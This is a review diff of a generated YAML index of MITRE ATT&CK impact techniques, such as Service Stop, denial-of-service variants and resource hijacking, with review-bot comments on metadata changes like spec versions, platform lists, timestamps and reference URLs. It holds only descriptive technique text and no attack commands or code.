- Stored data could include a variety of file formats, such as Office files, databases, stored emails, and custom file formats. The type of modification and the impact it will have depends on the type of data as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Stored Data Manipulation
- x_mitre_detection: Where applicable, inspect important file hashes, locations,
- and modifications for suspicious/unexpected values.
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
- x_mitre_is_subtechnique: true
- x_mitre_data_sources:
- - 'File: File Modification'
- - 'File: File Creation'
- - 'File: File Deletion'
- x_mitre_impact_type:
- - Integrity
- x_mitre_attack_spec_version: 2.1.0
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1489:
technique:
- x_mitre_platforms:
- - Windows
- - Linux
- - macOS
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
- created: '2019-03-29T19:00:55.901Z'
- x_mitre_version: '1.2'
- external_references:
- - source_name: mitre-attack
- external_id: T1489
- url: https://attack.mitre.org/techniques/T1489
- - source_name: SecureWorks WannaCry Analysis
- url: https://www.secureworks.com/research/wcry-ransomware-analysis
- description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
- Analysis. Retrieved March 26, 2019.
- - source_name: Talos Olympic Destroyer 2018
- url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
- description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
- Takes Aim At Winter Olympics. Retrieved March 14, 2019.
- - source_name: Novetta Blockbuster
- url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
- description: 'Novetta Threat Research Group. (2016, February 24). Operation
- Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
- 25, 2016.'
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-10-12T15:57:27.380Z'
+ name: Service Stop
description: "Adversaries may stop or disable services on a system to render
those services unavailable to legitimate users. Stopping critical services
or processes can inhibit or stop response to an incident or aid in the adversary's
overall objectives to cause damage to the environment.(Citation: Talos Olympic
Destroyer 2018)(Citation: Novetta Blockbuster) \n\nAdversaries may accomplish
this by disabling individual services of high importance to an organization,
- such as MSExchangeIS
, which will make Exchange content inaccessible
- (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable
- many or all services to render systems unusable.(Citation: Talos Olympic Destroyer
+ such as MSExchangeIS
, which will make Exchange content inaccessible.(Citation:
+ Novetta Blockbuster) In some cases, adversaries may stop or disable many or
+ all services to render systems unusable.(Citation: Talos Olympic Destroyer
2018) Services or processes may not allow for modification of their data stores
while running. Adversaries may stop services or processes in order to conduct
[Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted
for Impact](https://attack.mitre.org/techniques/T1486) on the data stores
of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis)"
- modified: '2022-11-08T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Service Stop
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor processes and command-line arguments to see if critical processes are terminated or stop running.
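Review bot: the `FireEye APT38 Oct 2018` reference for T1565.001 changes URL from `https://content.fireeye.com/apt/rpt-apt38` to `https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf`, a genuine content change that is easy to miss inside the reorder and worth a line in the PR description, since T1565.003 cites the same source name and should resolve to the same document. In the T1489 description, both the `-` and `+` text as rendered here break the line between `MSExchangeIS` and `, which will make Exchange content inaccessible`; a line break inside a double-quoted YAML scalar folds to a space and would yield `MSExchangeIS , which`, so confirm the regenerated string keeps whatever inline markup upstream uses around the service name rather than a bare newline. The citation punctuation fix (`.(Citation: Novetta Blockbuster) In some cases`) looks right.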
@@ -57139,10 +57894,14 @@ impact:
Alterations to the service binary path or the service startup type changed to disabled may be suspicious.
Remote access tools with built-in features may interact directly with the Windows API to perform these functions outside of typical system utilities. For example, ChangeServiceConfigW
may be used by an adversary to prevent services from starting.(Citation: Talos Olympic Destroyer 2018)
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: impact
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Windows
+ - Linux
+ - macOS
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Process: Process Creation'
- 'Process: Process Termination'
@@ -57153,39 +57912,37 @@ impact:
- 'Service: Service Metadata'
x_mitre_impact_type:
- Availability
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--20fb2507-d71c-455d-9b6d-6104461cf26b
+ created: '2019-03-29T19:00:55.901Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1489
+ external_id: T1489
+ - source_name: SecureWorks WannaCry Analysis
+ description: Counter Threat Unit Research Team. (2017, May 18). WCry Ransomware
+ Analysis. Retrieved March 26, 2019.
+ url: https://www.secureworks.com/research/wcry-ransomware-analysis
+ - source_name: Talos Olympic Destroyer 2018
+ description: Mercer, W. and Rascagneres, P. (2018, February 12). Olympic Destroyer
+ Takes Aim At Winter Olympics. Retrieved March 14, 2019.
+ url: https://blog.talosintelligence.com/2018/02/olympic-destroyer.html
+ - source_name: Novetta Blockbuster
+ description: 'Novetta Threat Research Group. (2016, February 24). Operation
+ Blockbuster: Unraveling the Long Thread of the Sony Attack. Retrieved February
+ 25, 2016.'
+ url: https://web.archive.org/web/20160226161828/https://www.operationblockbuster.com/wp-content/uploads/2016/02/Operation-Blockbuster-Report.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1489
atomic_tests: []
T1499.004:
technique:
- x_mitre_platforms:
- - Windows
- - Azure AD
- - Office 365
- - SaaS
- - IaaS
- - Linux
- - macOS
- - Google Workspace
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
- type: attack-pattern
- created: '2020-02-20T15:37:27.052Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1499.004
- url: https://attack.mitre.org/techniques/T1499/004
- - source_name: Sucuri BIND9 August 2015
- url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
- description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
- in the Wild. Retrieved April 26, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2024-10-15T15:42:23.001Z'
name: Application or System Exploitation
description: "Adversaries may exploit software vulnerabilities that can cause
an application or system to crash and deny availability to users. (Citation:
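Review bot: T1489 is the only technique in this range that carries an `identifier: T1489` key next to `atomic_tests` (an unchanged context line in the previous hunk); no other entry here has one. If the key is meaningful the generator should emit it for every technique; if it is a leftover from an earlier format, this regeneration is the right moment to drop it. The T1499.004 header in this hunk loses its old eight-platform list and its reference block, which are re-added below, so the effective change is the `modified` bump and the platform narrowing already applied to T1498.001.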
@@ -57203,13 +57960,20 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Attacks targeting web applications may generate logs in the
web server, application server, and/or database server that can be used to
identify the type of attack. Externally monitor the availability of services
that may be targeted by an Endpoint DoS.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.2'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - IaaS
+ - Linux
+ - macOS
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57217,36 +57981,27 @@ impact:
- 'Network Traffic: Network Traffic Flow'
x_mitre_impact_type:
- Availability
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
- atomic_tests: []
- T1565.003:
- technique:
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
type: attack-pattern
- created: '2020-03-02T14:30:05.252Z'
+ id: attack-pattern--2bee5ffb-7a7a-4119-b1f2-158151b19ac0
+ created: '2020-02-20T15:37:27.052Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1565.003
- url: https://attack.mitre.org/techniques/T1565/003
- - description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
- November 6, 2018.'
- url: https://content.fireeye.com/apt/rpt-apt38
- source_name: FireEye APT38 Oct 2018
- - source_name: DOJ Lazarus Sony 2018
- url: https://www.justice.gov/opa/press-release/file/1092091/download
- description: Department of Justice. (2018, September 6). Criminal Complaint
- - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
- modified: '2022-05-11T14:00:00.188Z'
+ url: https://attack.mitre.org/techniques/T1499/004
+ external_id: T1499.004
+ - source_name: Sucuri BIND9 August 2015
+ description: Cid, D.. (2015, August 2). BIND9 – Denial of Service Exploit
+ in the Wild. Retrieved April 26, 2019.
+ url: https://blog.sucuri.net/2015/08/bind9-denial-of-service-exploit-in-the-wild.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ atomic_tests: []
+ T1565.003:
+ technique:
+ modified: '2024-10-15T18:21:43.760Z'
name: Runtime Data Manipulation
description: |-
Adversaries may modify systems in order to manipulate the data as it is accessed and displayed to an end user, thus threatening the integrity of the data.(Citation: FireEye APT38 Oct 2018)(Citation: DOJ Lazarus Sony 2018) By manipulating runtime data, adversaries may attempt to affect a business process, organizational understanding, and decision making.
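Review bot: `- spec_version: '2.1'` is dropped here (and for every other technique in this diff) while `x_mitre_attack_spec_version` moves from 2.1.0 to 3.2.0. `spec_version` is a required property on STIX 2.1 domain objects, so any consumer that validates these entries as STIX will reject them after this change. If the upstream bundle no longer carries it, say so in the commit message; otherwise keep the field. Separately, the `id: attack-pattern--32ad5c86-...` / `created: '2020-03-02T14:30:05.252Z'` lines removed from the top of T1565.003 are the same values re-added at the bottom of that block in a later hunk, so T1565.003 keeps its identity; the T1499.004 block gains `revoked: false` and the Sucuri BIND9 reference that its description already cites.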
@@ -57255,11 +58010,17 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: Inspect important application binary file hashes, locations,
and modifications for suspicious/unexpected values.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'File: File Modification'
- 'File: File Deletion'
@@ -57268,17 +58029,31 @@ impact:
- 'File: File Creation'
x_mitre_impact_type:
- Integrity
- x_mitre_permissions_required:
- - User
- - Administrator
- - root
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--32ad5c86-2bcf-47d8-8fdc-d7f3d79a7490
+ created: '2020-03-02T14:30:05.252Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1565/003
+ external_id: T1565.003
+ - source_name: DOJ Lazarus Sony 2018
+ description: Department of Justice. (2018, September 6). Criminal Complaint
+ - United States of America v. PARK JIN HYOK. Retrieved March 29, 2019.
+ url: https://www.justice.gov/opa/press-release/file/1092091/download
+ - source_name: FireEye APT38 Oct 2018
+ description: 'FireEye. (2018, October 03). APT38: Un-usual Suspects. Retrieved
+ November 6, 2018.'
+ url: https://www.mandiant.com/sites/default/files/2021-09/rpt-apt38-2018-web_v5-1.pdf
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1498.002:
technique:
- modified: '2023-03-30T21:01:41.052Z'
+ modified: '2024-10-15T16:04:34.495Z'
name: Reflection Amplification
description: |-
Adversaries may attempt to cause a denial of service (DoS) by reflecting a high-volume of network traffic to a target. This type of Network DoS takes advantage of a third-party server intermediary that hosts and will respond to a given spoofed source IP address. This third-party server is commonly termed a reflector. An adversary accomplishes a reflection attack by sending packets to reflectors with the spoofed address of the victim. Similar to Direct Network Floods, more than one system may be used to conduct the attack, or a botnet may be used. Likewise, one or more reflectors may be used to focus traffic on the target.(Citation: Cloudflare ReflectionDoS May 2017) This Network DoS attack may also reduce the availability and functionality of the targeted system(s) and network.
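Review bot: `x_mitre_permissions_required` (User, Administrator, root, SYSTEM) is removed from T1565.003 with nothing replacing it. That matches newer ATT&CK releases, which no longer publish the field, but anything in this repo or downstream that filters or scores tests on `permissions_required` will silently get an empty value from now on; worth a line in the commit message. The FireEye APT38 reference keeps the same `source_name` and only changes its `url` to the Mandiant-hosted PDF, so citations in descriptions still resolve.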
@@ -57287,6 +58062,7 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
+ x_mitre_deprecated: false
x_mitre_detection: 'Detection of reflection amplification can sometimes be achieved
before the traffic volume is sufficient to cause impact to the availability
of the service, but such response time typically requires very aggressive
@@ -57302,17 +58078,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Sensor Health: Host Status'
- 'Network Traffic: Network Traffic Flow'
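Review bot: T1498.002 loses `Azure AD`, `Office 365`, `SaaS` and `Google Workspace` from `x_mitre_platforms` and nothing is added in their place, leaving Windows, IaaS, Linux and macOS. That is a narrowing of scope rather than a rename, unlike T1657 further down, where `Office 365` and `Google Workspace` become `Office Suite`. The same outright drop happens for T1499.002 and T1499 below. If this is the upstream ATT&CK decision it is fine, but any platform-specific index derived from this file needs regenerating in the same change so it does not keep listing these techniques under platforms they no longer declare.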
@@ -57322,14 +58093,15 @@ impact:
id: attack-pattern--36b2a1d7-e09e-49bf-b45e-477076c2ec01
created: '2020-03-02T20:08:03.691Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1498/002
external_id: T1498.002
- - source_name: Cloudflare ReflectionDoS May 2017
- description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
- (attacks). Retrieved April 23, 2019.
- url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cisco DoSdetectNetflow
+ description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
+ Retrieved April 25, 2019.
+ url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
- source_name: Cloudflare DNSamplficationDoS
description: Cloudflare. (n.d.). What is a DNS amplification attack?. Retrieved
April 23, 2019.
@@ -57338,28 +58110,28 @@ impact:
description: Cloudflare. (n.d.). What is a NTP amplificaiton attack?. Retrieved
April 23, 2019.
url: https://www.cloudflare.com/learning/ddos/ntp-amplification-ddos-attack/
+ - source_name: Cloudflare ReflectionDoS May 2017
+ description: Marek Majkowsk, Cloudflare. (2017, May 24). Reflections on reflection
+ (attacks). Retrieved April 23, 2019.
+ url: https://blog.cloudflare.com/reflections-on-reflections/
+ - source_name: Cloudflare Memcrashed Feb 2018
+ description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
+ - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
+ url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- source_name: Arbor AnnualDoSreport Jan 2018
description: Philippe Alcoy, Steinthor Bjarnason, Paul Bowen, C.F. Chui, Kirill
Kasavchnko, and Gary Sockrider of Netscout Arbor. (2018, January). Insight
into the Global Threat Landscape - Netscout Arbor's 13th Annual Worldwide
Infrastructure Security Report. Retrieved April 22, 2019.
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
- - source_name: Cloudflare Memcrashed Feb 2018
- description: Marek Majkowski of Cloudflare. (2018, February 27). Memcrashed
- - Major amplification attacks from UDP port 11211. Retrieved April 18, 2019.
- url: https://blog.cloudflare.com/memcrashed-major-amplification-attacks-from-port-11211/
- - source_name: Cisco DoSdetectNetflow
- description: Cisco. (n.d.). Detecting and Analyzing Network Threats With NetFlow.
- Retrieved April 25, 2019.
- url: https://www.cisco.com/c/en/us/td/docs/ios-xml/ios/netflow/configuration/15-mt/nf-15-mt-book/nf-detct-analy-thrts.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.1.0
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1499.002:
technique:
- modified: '2023-05-09T14:00:00.188Z'
+ modified: '2024-10-15T16:05:48.014Z'
name: Service Exhaustion Flood
description: |-
Adversaries may target the different network services provided by systems to conduct a denial of service (DoS). Adversaries often target the availability of DNS and web services, however others have been targeted as well.(Citation: Arbor AnnualDoSreport Jan 2018) Web server software can be attacked through a variety of means, some of which apply generally while others are specific to the software being used to provide the service.
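Review bot: the `external_references` churn in this and the previous hunk is pure reordering: Cisco DoSdetectNetflow moves to the top, Cloudflare ReflectionDoS and Memcrashed move down, and all six entries survive, so nothing a description cites is lost. Note that the upstream typos in the citation text (`Majkowsk`, `amplificaiton`) are carried through; since the file is generated from the ATT&CK bundle they should not be hand-fixed here or the next regeneration will reintroduce them.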
@@ -57370,7 +58142,6 @@ impact:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: impact
- x_mitre_attack_spec_version: 2.1.0
x_mitre_deprecated: false
x_mitre_detection: |-
Detection of Endpoint DoS can sometimes be achieved before the effect is sufficient to cause significant impact to the availability of the service, but such response time typically requires very aggressive monitoring and responsiveness. Typical network throughput monitoring tools such as netflow, SNMP, and custom scripts can be used to detect sudden increases in circuit utilization.(Citation: Cisco DoSdetectNetflow) Real-time, automated, and qualitative study of the network traffic can identify a sudden surge in one type of protocol can be used to detect an attack as it starts.
@@ -57381,17 +58152,12 @@ impact:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- Windows
- - Azure AD
- - Office 365
- - SaaS
- IaaS
- Linux
- macOS
- - Google Workspace
- x_mitre_version: '1.3'
+ x_mitre_version: '1.4'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
- 'Sensor Health: Host Status'
@@ -57428,7 +58194,8 @@ impact:
url: https://pages.arbornetworks.com/rs/082-KNA-087/images/13th_Worldwide_Infrastructure_Security_Report.pdf
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- spec_version: '2.1'
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1491:
technique:
@@ -57449,7 +58216,7 @@ impact:
- source_name: mitre-attack
external_id: T1491
url: https://attack.mitre.org/techniques/T1491
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-25T19:34:42.056Z'
name: Defacement
description: "Adversaries may modify visual content available internally or
externally to an enterprise network, thus affecting the integrity of the original
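Review bot: the `modified` timestamp for T1491 moves backwards, from `'2022-05-11T14:00:00.188Z'` to `'2022-03-25T19:34:42.056Z'`. The old value has the same `T14:00:00.188Z` suffix as the old values for T1565.003, T1499.002 and T1531 in this diff, which looks like a bulk-normalized date, and the new one looks like a real per-object timestamp, but a regressing `modified` should be confirmed against the upstream STIX bundle before merging rather than assumed.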
@@ -57476,12 +58243,78 @@ impact:
x_mitre_impact_type:
- Integrity
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ atomic_tests: []
+ T1496.002:
+ technique:
+ modified: '2024-09-25T14:59:35.287Z'
+ name: Bandwidth Hijacking
+ description: "Adversaries may leverage the network bandwidth resources of co-opted
+ systems to complete resource-intensive tasks, which may impact system and/or
+ hosted service availability. \n\nAdversaries may also use malware that leverages
+ a system's network bandwidth as part of a botnet in order to facilitate [Network
+ Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or
+ to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage
+ in proxyjacking by selling use of the victims' network bandwidth and IP address
+ to proxyware services.(Citation: Sysdig Proxyjacking) Finally, they may engage
+ in internet-wide scanning in order to identify additional targets for compromise.(Citation:
+ Unit 42 Leaked Environment Variables 2024)\n\nIn addition to incurring potential
+ financial costs or availability disruptions, this technique may cause reputational
+ damage if a victim’s bandwidth is used for illegal activities.(Citation: Sysdig
+ Proxyjacking)"
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Linux
+ - Windows
+ - macOS
+ - IaaS
+ - Containers
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Network Traffic: Network Traffic Flow'
+ - 'File: File Creation'
+ - 'Command: Command Execution'
+ - 'Process: Process Creation'
+ - 'Network Traffic: Network Traffic Content'
+ - 'Network Traffic: Network Connection Creation'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--718cb208-6446-4572-a2f0-9c799c60091e
+ created: '2024-09-25T13:44:35.412Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/002
+ external_id: T1496.002
+ - source_name: Sysdig Proxyjacking
+ description: Crystal Morin. (2023, April 4). Proxyjacking has Entered the
+ Chat. Retrieved July 6, 2023.
+ url: https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/
+ - source_name: Unit 42 Leaked Environment Variables 2024
+ description: Margaret Kelley, Sean Johnstone, William Gamazo, and Nathaniel
+ Quist. (2024, August 15). Leaked Environment Variables Allow Large-Scale
+ Extortion Operation in Cloud Environments. Retrieved September 25, 2024.
+ url: https://unit42.paloaltonetworks.com/large-scale-cloud-extortion-operation/
+ - source_name: GoBotKR
+ description: Zuzana Hromcová. (2019, July 8). Malicious campaign targets South
+ Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.
+ url: https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1657:
technique:
- modified: '2024-04-11T20:22:14.359Z'
+ modified: '2024-10-15T15:58:10.254Z'
name: Financial Theft
description: "Adversaries may steal monetary resources from targets through
extortion, social engineering, technical theft, or other methods aimed at
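Review bot: T1491 loses `x_mitre_attack_spec_version: 2.1.0` and `spec_version: '2.1'` here and, within this hunk, nothing is added back, whereas every other technique in the diff ends up with `x_mitre_attack_spec_version: 3.2.0`. Check that the field is set elsewhere in the T1491 block; if not, this entry is the odd one out. The new T1496.002 (Bandwidth Hijacking) block is internally consistent: all three citations in its description (GoBotKR, Sysdig Proxyjacking, Unit 42 Leaked Environment Variables 2024) appear in `external_references`. Its `x_mitre_detection: ''` is expected for a newly published sub-technique and not a blocker.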
@@ -57514,7 +58347,7 @@ impact:
x_mitre_contributors:
- Blake Strom, Microsoft Threat Intelligence
- Pawel Partyka, Microsoft Threat Intelligence
- - Goldstein Menachem
+ - Menachem Goldstein
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -57524,10 +58357,9 @@ impact:
- Linux
- macOS
- Windows
- - Office 365
- SaaS
- - Google Workspace
- x_mitre_version: '1.1'
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Application Log: Application Log Content'
x_mitre_impact_type:
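Review bot: here the platform change is a rename, `Office 365` and `Google Workspace` collapsing into `Office Suite`, while in T1498.002, T1499.002 and T1499 the equivalent cloud platforms are simply deleted. Both can be correct if that is what the upstream bundle says, but the inconsistency is worth a sentence in the commit message so nobody later "fixes" one to match the other.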
@@ -57590,7 +58422,6 @@ impact:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1491.001:
technique:
@@ -57631,7 +58462,7 @@ impact:
messages. Since internally defacing systems exposes an adversary''s presence,
it often takes place after other intrusion goals have been accomplished.(Citation:
Novetta Blockbuster Destructive Malware)'
- modified: '2022-11-08T14:00:00.188Z'
+ modified: '2022-07-28T18:55:35.988Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
name: 'Defacement: Internal Defacement'
x_mitre_detection: Monitor internal and websites for unplanned content changes.
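Review bot: T1491.001 is the second entry whose `modified` goes backwards (`2022-11-08` to `2022-07-28`), and the following hunk shows it keeping `x_mitre_attack_spec_version: 2.1.0` rather than moving to 3.2.0 like the rest. Same request as for T1491: confirm both values against the upstream bundle.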
@@ -57652,9 +58483,157 @@ impact:
- Integrity
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1491.001
atomic_tests: []
+ T1496.004:
+ technique:
+ modified: '2024-10-16T17:59:27.535Z'
+ name: Cloud Service Hijacking
+ description: "Adversaries may leverage compromised software-as-a-service (SaaS)
+ applications to complete resource-intensive tasks, which may impact hosted
+ service availability. \n\nFor example, adversaries may leverage email and
+ messaging services, such as AWS Simple Email Service (SES), AWS Simple Notification
+ Service (SNS), SendGrid, and Twilio, in order to send large quantities of
+ spam / [Phishing](https://attack.mitre.org/techniques/T1566) emails and SMS
+ messages.(Citation: Invictus IR DangerDev 2024)(Citation: Permiso SES Abuse
+ 2023)(Citation: SentinelLabs SNS Sender 2024) Alternatively, they may engage
+ in LLMJacking by leveraging reverse proxies to hijack the power of cloud-hosted
+ AI models.(Citation: Sysdig LLMJacking 2024)(Citation: Lacework LLMJacking
+ 2024)\n\nIn some cases, adversaries may leverage services that the victim
+ is already using. In others, particularly when the service is part of a larger
+ cloud platform, they may first enable the service.(Citation: Sysdig LLMJacking
+ 2024) Leveraging SaaS applications may cause the victim to incur significant
+ financial costs, use up service quotas, and otherwise impact availability. "
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: impact
+ x_mitre_deprecated: false
+ x_mitre_detection: ''
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - SaaS
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - 'Cloud Service: Cloud Service Modification'
+ - 'Application Log: Application Log Content'
+ x_mitre_impact_type:
+ - Availability
+ type: attack-pattern
+ id: attack-pattern--924d273c-be0d-4d8d-af58-2dddb15ef1e2
+ created: '2024-09-25T14:05:59.910Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1496/004
+ external_id: T1496.004
+ - source_name: SentinelLabs SNS Sender 2024
+ description: Alex Delamotte. (2024, February 15). SNS Sender | Active Campaigns
+ Unleash Messaging Spam Through the Cloud. Retrieved September 25, 2024.
